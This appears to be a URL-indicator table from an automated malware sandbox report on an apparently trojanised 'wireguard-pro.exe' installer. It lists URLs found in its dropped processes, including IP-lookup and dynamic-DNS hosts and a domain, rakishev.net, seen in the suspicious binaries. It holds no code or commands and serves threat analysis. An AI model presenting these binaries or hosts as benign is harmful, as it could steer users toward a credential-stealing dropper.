https://www.wireguard.com/donations/key	wireguard.exe, 00000007.00000000.635889564.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000000.636854021.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637554175.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129407709.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe.4.dr	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net/	7ABGVF6Q.exe, 00000002.00000003.636569317.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.636540344.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.entrust.net/ts2ca.crl	7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	false		high
https://rakishev.net	HQL82NEF.exe, 00000003.00000002.1130370284.0000000003021000.00000004.00000800.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000002.1130370284.0000000003130000.00000004.00000800.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000002.1130370284.0000000003118000.00000004.00000800.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000002.1130370284.0000000003218000.00000004.00000800.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000002.1130370284.00000000031C6000.00000004.00000800.00020000.00000000.sdmp, audddd.exe, 00000012.00000002.1130043330.0000000003267000.00000004.00000800.00020000.00000000.sdmp, audddd.exe, 00000012.00000002.1130043330.000000000312C000.00000004.00000800.00020000.00000000.sdmp, audddd.exe, 00000012.00000002.1130043330.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, audddd.exe, 00000012.00000002.1130043330.0000000003021000.00000004.00000800.00020000.00000000.sdmp, audddd.exe, 00000012.00000002.1130043330.000000000315F000.00000004.00000800.00020000.00000000.sdmp, audddd.exe, 00000012.00000002.1130043330.00000000030AA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://Paltalk.com	wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000002.1130370284.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000000.614084883.0000000000B22000.00000002.00000001.01000000.00000008.sdmp, audddd.exe, 00000012.00000002.1130043330.00000000030AA000.00000004.00000800.00020000.00000000.sdmp, audddd.exe.3.dr	false		high
https://download.wireguard.com/windows-client/WireGuard:	wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636625601.000000000030B000.00000002.00000001.01000000.00000007.sdmp, 7ABGVF6Q.exe, 00000002.00000000.613733198.000000000030B000.00000002.00000001.01000000.00000007.sdmp, 7ABGVF6Q.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/csbr1.crl	7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.entrust.net/csbr1.crl0	wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, wireguard-pro.exe, 00000000.00000002.619123097.000000001B7F3000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636785366.0000000003970000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618543318.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636746395.000000000339C000.00000004.00000010.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618576172.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619323123.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000007.00000002.638405462.000001D1E3F38000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638242969.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638269345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638236345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638277599.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, MSIC8E4.tmp.4.dr, MSIC9A4.tmp.4.dr, MSIC943.tmp.4.dr, 51c6ff.msi.4.dr, MSIC944.tmp.4.dr, 4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4.2.dr	false		high
http://ocsp.entrust.nethttp://crl.entrust.net/csbr1.crl9	7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620774039.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.636527077.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619323123.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/csbr1.crl2	7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619323123.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.entrust.net:80	7ABGVF6Q.exe, 00000002.00000003.620774039.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.636527077.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000B63000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.entrust.net1.3.6.1.5.5.7.48.2http://aia.entrust.net/evcs2-chain.p7c	7ABGVF6Q.exe, 00000002.00000003.636540344.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://crl.entrust.ne	7ABGVF6Q.exe, 00000002.00000002.636785366.0000000003970000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618543318.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618576172.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.nethttp://crl.entrust.net/evcs2.crlO	7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620774039.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.636527077.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.nett	7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.com	audddd.exe, 00000011.00000002.821401870.0000000002E23000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://aia.entrust.net/evcs2-chain.p7c01	wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.636540344.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620792893.0000000000B49000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638242969.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638269345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638236345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638277599.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, MSIC8E4.tmp.4.dr, MSIC9A4.tmp.4.dr, MSIC943.tmp.4.dr, 51c6ff.msi.4.dr, MSIC944.tmp.4.dr, 4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4.2.dr, MSIC9F4.tmp.4.dr, MSIC895.tmp.4.dr, 51c702.msi.4.dr, 7ABGVF6Q.exe.0.dr	false		high
http://crl.entrust.net/evcs2.crlv	7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	wireguard-pro.exe, 00000000.00000002.618991425.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000002.1130370284.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, audddd.exe, 00000011.00000002.821401870.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, audddd.exe, 00000012.00000002.1130043330.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.entrust.net/rpa0	wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, wireguard-pro.exe, 00000000.00000002.619123097.000000001B7F3000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618543318.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636746395.000000000339C000.00000004.00000010.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618576172.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619323123.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638242969.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638269345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638236345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638277599.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, MSIC8E4.tmp.4.dr, MSIC9A4.tmp.4.dr, MSIC943.tmp.4.dr, 51c6ff.msi.4.dr, MSIC944.tmp.4.dr, 4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4.2.dr, MSIC9F4.tmp.4.dr, MSIC895.tmp.4.dr	false		high
http://ocsp.entrust.net	7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.entrust.net1.3.6.1.5.5.7.48.2http://aia.entrust.net/ts2-chain256.cer	7ABGVF6Q.exe, 00000002.00000003.636540344.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://ocsp.entrust.nethttp://crl.entrust.net/csbr1.crl	7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.netb	7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTLXNCzDvBhHecWjg70iJhBW0InywQUanImetAe733nO2lR	7ABGVF6Q.exe, 00000002.00000003.618576172.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619323123.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.wireguard.com/initSpan:	wireguard.exe, 00000007.00000000.635889564.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000000.636854021.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637554175.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129407709.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe.4.dr	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/H	HQL82NEF.exe, 00000003.00000002.1129347191.0000000001031000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.entrust.net/rpa2.23.140.1.3	wireguard.exe, 00000007.00000002.637722285.000000C000056000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.entrust.net/rpa03	wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, wireguard-pro.exe, 00000000.00000002.619123097.000000001B7F3000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618543318.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636746395.000000000339C000.00000004.00000010.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618576172.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619323123.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000007.00000002.638405462.000001D1E3F38000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638242969.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638269345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638236345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638277599.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, MSIC8E4.tmp.4.dr, MSIC9A4.tmp.4.dr, MSIC943.tmp.4.dr, 51c6ff.msi.4.dr, MSIC944.tmp.4.dr, 4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4.2.dr, MSIC9F4.tmp.4.dr	false		high
https://download.wireguard.com/windows-client/latest.signcreasep	wireguard.exe, 00000009.00000003.769643610.0000028D9BFB6000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.639789020.0000028D9BFB5000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000002.1132028506.0000028D9BFB8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.wireguard.com/D	wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000000.613742894.0000000000313000.00000002.00000001.01000000.00000007.sdmp, wireguard.exe, 00000007.00000000.636028833.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000002.639602430.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637652316.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129667610.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, 7ABGVF6Q.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/evcs2.crl	7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.entrust.net/rpa	wireguard.exe, 00000007.00000002.638198427.000000C000174000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crl.ver)	svchost.exe, 0000001C.00000002.815507931.000002034A4E8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://upx.sf.net	Amcache.hve.0.dr	false		high
http://checkip.dyndns.org	audddd.exe, 00000011.00000002.821401870.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, audddd.exe, 00000011.00000002.821401870.0000000002E23000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.entrust.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRr2bwARTxMtEy9aspRAZg5QFhagQQUgrrWPZfOn89x6JI3	7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619340546.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 026A86A161D256DBB33076EDF20C0E5E_8372263305412A8ACAD18CE348CFB7C80.2.dr, 026A86A161D256DBB33076EDF20C0E5E_86AB612B21DEDF3B8CD155ED2E4114FF0.2.dr	false		high
https://download.wireguard.com/windows-client/	wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, 7ABGVF6Q.exe, 7ABGVF6Q.exe, 00000002.00000002.636625601.000000000030B000.00000002.00000001.01000000.00000007.sdmp, 7ABGVF6Q.exe, 00000002.00000000.613733198.000000000030B000.00000002.00000001.01000000.00000007.sdmp, 7ABGVF6Q.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/E	wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000000.614084883.0000000000B22000.00000002.00000001.01000000.00000008.sdmp, audddd.exe.3.dr	false	Avira URL Cloud: safe	unknown
http://www.entrust.net/rpa	wireguard.exe, 00000007.00000002.638198427.000000C000152000.00000004.00001000.00020000.00000000.sdmp, wireguard.exe, 00000007.00000002.637722285.000000C000056000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crl.entrust.net/csbr1.crl&	7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.entrust.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQXoCibpolAJkHkrE10coCb1HRkIAQUJg%2FwxEgIG83dkf	7ABGVF6Q.exe, 00000002.00000003.620363819.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, A9B13BCD41ACB49316A37129BE941FFA_BD22E51CB23A085126973E3A7E5399780.2.dr	false		high
https://download.wireguard.com/L8	wireguard.exe, 00000009.00000003.639594156.0000028DC1E6A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://no-ip.com	wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000002.1130370284.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000000.614084883.0000000000B22000.00000002.00000001.01000000.00000008.sdmp, audddd.exe, 00000012.00000002.1130043330.00000000030AA000.00000004.00000800.00020000.00000000.sdmp, audddd.exe.3.dr	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRp%2BmQDKauE4nIg%2FgknZHuBlLkfKgQUzolPglGqFaKE	7ABGVF6Q.exe, 00000002.00000003.620370009.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619645470.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620008640.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620792893.0000000000B4F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.entrust.net/rpa2.23.140.1.3	wireguard.exe, 00000007.00000002.638198427.000000C000174000.00000004.00001000.00020000.00000000.sdmp	false		high
http://rakishev.net	HQL82NEF.exe, 00000003.00000002.1130370284.0000000003091000.00000004.00000800.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000002.1130370284.0000000003021000.00000004.00000800.00020000.00000000.sdmp, HQL82NEF.exe, 00000003.00000002.1130370284.00000000031C6000.00000004.00000800.00020000.00000000.sdmp, audddd.exe, 00000012.00000002.1130043330.0000000003267000.00000004.00000800.00020000.00000000.sdmp, audddd.exe, 00000012.00000002.1130043330.000000000312C000.00000004.00000800.00020000.00000000.sdmp, audddd.exe, 00000012.00000002.1130043330.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, audddd.exe, 00000012.00000002.1130043330.000000000315F000.00000004.00000800.00020000.00000000.sdmp, audddd.exe, 00000012.00000002.1130043330.00000000030AA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.microsof	wireguard.exe, 00000009.00000002.1132736589.0000028DC1EAE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://download.wireguard.com/	7ABGVF6Q.exe, 00000002.00000003.636540344.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.769603096.0000028D9BFCB000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.639594156.0000028DC1E6A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.769716348.0000028DC1E6A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://download.wireguard.com/windows-client/wireguard-amd64-0.5.3.msioL	7ABGVF6Q.exe, 00000002.00000003.636540344.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/evcs2.crl8	7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	false		high
https://download.wireguard.com/v8	wireguard.exe, 00000009.00000003.639594156.0000028DC1E6A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/ts2ca.crl0	wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, wireguard-pro.exe, 00000000.00000002.619123097.000000001B7F3000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618543318.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636746395.000000000339C000.00000004.00000010.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.618576172.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620774039.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.636527077.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619323123.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638242969.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638269345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638236345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638277599.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, MSIC8E4.tmp.4.dr, MSIC9A4.tmp.4.dr, MSIC943.tmp.4.dr, 51c6ff.msi.4.dr, MSIC944.tmp.4.dr	false		high
http://ocsp.entrust.netI	7ABGVF6Q.exe, 00000002.00000003.619632785.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620342958.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619323123.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.619979982.0000000000B67000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/evcs2.crl0	wireguard-pro.exe, 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.636540344.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.620792893.0000000000B49000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638242969.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638269345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638236345.0000028D9BF8A000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.638277599.0000028D9BF73000.00000004.00000020.00020000.00000000.sdmp, MSIC8E4.tmp.4.dr, MSIC9A4.tmp.4.dr, MSIC943.tmp.4.dr, 51c6ff.msi.4.dr, MSIC944.tmp.4.dr, 4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4.2.dr, MSIC9F4.tmp.4.dr, MSIC895.tmp.4.dr, 51c702.msi.4.dr, 7ABGVF6Q.exe.0.dr	false		high
https://www.wireguard.net/D	wireguard.exe, 00000007.00000000.636028833.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000002.639602430.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637652316.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129667610.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp	false	Avira URL Cloud: safe	unknown
